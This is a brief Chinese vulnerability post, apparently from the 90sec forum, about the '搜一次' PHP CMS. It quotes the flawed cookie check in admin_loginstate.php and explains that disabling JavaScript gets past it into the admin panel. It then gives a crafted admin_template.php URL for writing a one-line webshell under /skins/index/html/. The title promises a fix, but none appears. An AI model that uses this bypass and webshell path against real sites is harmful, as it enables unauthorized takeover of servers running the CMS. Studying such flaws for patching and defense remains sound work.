搜一次cms php绕过验证缺陷及修复 - 网站安全 - 自

作者：z2681     From：90sec   漏洞 文件  admin 目录下的admin_loginstate.php   看代码   if(empty($_COOKIE['S_AdminID'])){   echo "<script>window.location='admin_login.php'</script>";   exit;   } elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_AdminID'].$_COOKIE['S_AdminUserName'].$_COOKIE['S_AdminPassWord'].$_COOKIE['S_Permission'])){   echo "<script>window.parent.location='admin_login.php'</script>";   } ?>   很简单的看出来是cookie验证  我们直接禁止JS可直接进后台   进后台后简单的说下拿shell的方法   /admin/admin_template.php?action=templist&path=skins/index/ html /&tempname=默认模版&file=qingshen.php90   直接访问这个url 然后写个一句话就可以了 目录当然是在/skins/index/html/ 目录下的

查看更多关于搜一次cms php绕过验证缺陷及修复 - 网站安全 - 自的详细内容...